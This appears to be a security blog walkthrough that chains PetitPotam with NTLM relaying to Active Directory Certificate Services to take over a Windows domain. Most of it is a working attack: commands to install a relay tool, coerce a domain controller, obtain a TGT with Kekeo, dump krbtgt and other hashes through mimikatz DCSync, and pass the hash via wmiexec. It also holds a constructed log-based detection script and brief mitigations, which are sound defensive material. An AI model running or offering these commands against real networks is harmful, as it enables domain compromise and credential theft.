From Stranger to DA // Using PetitPotam to NTLM relay to Domain Administrator

Knock knock, who’s there? Your new DA!

This attack chains two recently disclosed issues, namely:

  • MS-EFSRPC – AKA PetitPotam
  • Credential Relaying abusing the AD CS role

Any attacker with internal network access, such as a phished client or a malicious device planted on the network, can take over the entire Active Directory domain without any initial credentials. Domain Controllers and AD CS are currently vulnerable to this attack in their default configuration.

When PetitPotam is exploited and NTLM credentials are relayed to Active Directory Certificate Services, an attacker can obtain Domain Administrator privileges without any prior authentication to the domain. This article will detail the steps necessary for exploitation, followed by some words on mitigations for PetitPotam.

An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket.

AD CS (Active Directory Certificate Services) is particularly interesting as it offers role services that by default accept NTLM based authentication. These services specifically include Certificate Authority Web Enrollment and the Certificate Enrollment Web Service.

Steps

  1. Use PetitPotam to trigger NTLM authentication from the Domain Controller to the Listener (Running Responder or ntlmrelayx)
  2. Use ntlmrelayx to relay the DC’s credentials to the AD CS (Active Directory Certificate Services) server with Web Enrollment enabled (NTLM auth must be enabled and is enabled by default), using the “KerberosAuthentication” or “DomainControllers” AD CS template.
  3. Obtain the Base64 PKCS12 certificate issued through NTLM relaying
  4. Import the Base64 PKCS12 certificate into Kekeo and ask for a TGT (Ticket Granting Ticket)
  5. Use mimikatz to dump LSA secrets for the user of choice (Administrator, krbtgt, etc.)
  6. Note down the NT hash from the domain administrator user
  7. Use wmiexec to gain execution as that user against the Domain Controller and perform Pass-The-Hash of the NT hash
  8. ???
  9. Profit! You’re DA!

Step 1-3 – Exploit PetitPotam and Relay to Active Directory Certificate Services

Before you can exploit PetitPotam (MS-EFSRPC), you need to set up ntlmrelayx to catch the authentication and relay it to the AD CS server. In this example we’re going to be using the KerberosAuthentication AD CS template; however, we could also have used the DomainControllers template.

git clone https://github.com/ExAndroidDev/impacket.git # Clone the custom ntlmrelayx repo
cd impacket
git checkout ntlmrelayx-adcs-attack # checkout to the right branch - this caught me out
sudo pip3 uninstall impacket # Uninstall the old impacket so there aren't any conflicts
sudo pip uninstall impacket
sudo pip3 install -r requirements.txt
sudo python3 setup.py install # install this version of impacket with the adcs flag

sudo python3 ntlmrelayx.py -debug -smb2support --target http://pki.lab.local/certsrv/certfnsh.asp --adcs --template KerberosAuthentication # start the relay - change pki.lab.local to the domain name of your ADCS Server
[Screenshot: ntlmrelayx.py relay to AD CS]

Now that ntlmrelayx is waiting, trigger NTLM authentication through PetitPotam. (Note that there are several other ways to trigger NTLM authentication, including Responder, mitm6, PrinterBug, PrintNightmare, etc.) This will cause the DC to authenticate to the relay listener, which relays the NTLM credentials on to the AD CS server.

Use PetitPotam to trigger NTLM authentication from the Domain Controller against the Listener (Running Responder or ntlmrelayx)

git clone https://github.com/topotam/PetitPotam
cd PetitPotam/
sudo pip3 install -r requirements.txt
python3 Petitpotam.py <listener> <target (DC)>
# In this case, your listener is your relay IP, and the target is the IP of the domain controller you're targeting
[Screenshot: Exploiting PetitPotam against the domain controller to trigger NTLM authentication]
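As an added defensive example that is not part of the original article: the relay above arrives at the AD CS server as a POST to certfnsh.asp authenticated as the DC machine account but originating from the relay host, so the Web Enrollment site's IIS log is a place to spot it. The log lines, the DC account-to-address mapping and the field layout below are constructed for the example.

```python
# Constructed sample IIS W3C log for the AD CS Web Enrollment site (not real data).
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2021-07-27 10:01:02 10.0.0.20 POST /certsrv/certfnsh.asp - 80 LAB\\DC-101$ 10.0.0.18 200
2021-07-27 10:02:15 10.0.0.20 GET /certsrv/certrqus.asp - 80 LAB\\alice 10.0.0.55 200
2021-07-27 10:03:40 10.0.0.20 POST /certsrv/certfnsh.asp - 80 LAB\\DC-101$ 10.0.0.99 200
2021-07-27 10:04:01 10.0.0.20 POST /certsrv/certfnsh.asp - 80 LAB\\WS-07$ 10.0.0.55 200
"""

# Constructed: the address each domain controller's machine account is expected to use.
DC_ACCOUNTS = {"DC-101$": "10.0.0.18"}


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def suspicious_enrollments(text, dc_accounts=DC_ACCOUNTS):
    """Flag certificate submissions made with a machine account.

    'high'   : a known DC account submitted from an address that is not that DC,
               which is what a relayed DC credential looks like.
    'review' : any other machine account using the web pages; machine accounts
               normally autoenroll over RPC/DCOM rather than through certsrv.
    """
    hits = []
    for rec in parse_w3c(text):
        if rec["cs-uri-stem"].lower() != "/certsrv/certfnsh.asp":
            continue
        user = rec["cs-username"].split("\\")[-1]  # strip the DOMAIN\ prefix
        if not user.endswith("$"):
            continue  # interactive user enrollment is out of scope here
        expected = dc_accounts.get(user)
        if expected is None:
            hits.append(("review", user, rec["c-ip"]))
        elif rec["c-ip"] != expected:
            hits.append(("high", user, rec["c-ip"]))
    return hits


if __name__ == "__main__":
    for severity, user, ip in suspicious_enrollments(SAMPLE_LOG):
        print(f"{severity}: {user} enrolled via certfnsh.asp from {ip}")
```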

Step 4-6 – Obtain a TGT with the Base64 PKCS12 Certificate enrolled to AD CS

Take the Base64 PKCS12 certificate which has now been enrolled through AD CS (Active Directory Certificate Services) and import it into Kekeo to obtain a TGT (Ticket Granting Ticket). An attacker can also use Rubeus to perform this step.

Example Demo by Benjamin Delpy

Below is a short demo from Benjamin Delpy / Gentilkiwi on using Kekeo & Mimikatz to exploit PetitPotam and dump LSA.

[Screenshot: Demo from Benjamin Delpy of exploitation of MS-EFSRPC]
  • Use Kekeo to ask for a TGT from the PKCS12 Base64 certificate obtained through NTLM relaying
  • Use mimikatz to dump LSA secrets
curl https://github.com/gentilkiwi/kekeo/releases/download/2.2.0-20210723/kekeo.zip -o kekeo.zip
tar -xf .\kekeo.zip
.\x64\kekeo.exe
base64 /input:on
tgt::ask /pfx:<base64 cert from relay> /user:dc-101$ /domain:spencer.local /ptt
exit

curl https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip -o mimikatz.zip
tar -xf mimikatz.zip
.\x64\mimikatz.exe
lsadump::dcsync /domain:spencer.local /user:krbtgt # note down the NTLM hash
lsadump::dcsync /domain:spencer.local /user:<any user>
exit
[Screenshot: Obtaining a TGT via the PFX Base64 certificate]
[Screenshot: Performing a DCSync against the domain controller with the obtained TGT]

Step 7 – Pass-The-Hash of the NT hash of the target User

Use the NT hash of the target user to gain execution through WMI.

wmiexec.py -hashes :9815c330fd6ce34663a2e7a5f0444848 spencer/op@10.0.0.18
[Screenshot: Obtaining an interactive shell via wmiexec.py using PTH (Pass-The-Hash)]

Conclusion

These two bugs chained together allow for instant escalation from a low privilege user to domain administrator in a matter of minutes. This is a devastating bug that, at the time of writing, will work against a fully patched Domain Controller and Active Directory Certificate Services setup.

Mitigations

This article will not go into deep detail regarding mitigations, as Hasain has already written a very extensive article on mitigations for PetitPotam and preventing the capture of NT hashes; it can be found here.

  • Remove the listed role services if not justified by a business need. In most of the cases the affected services are replaceable by other API/interfaces such as the built-in RPC interfaces.
  • Restrict/disable inbound NTLM authentication to the server running the role service by setting the policy “Network security: Restrict NTLM: Incoming NTLM traffic”.
  • Disable/remove the NTLM provider in the Internet Information Services (IIS) running the selected role services.

Links & Further Research

Further in-depth reading on this topic and the theory behind it can be found below: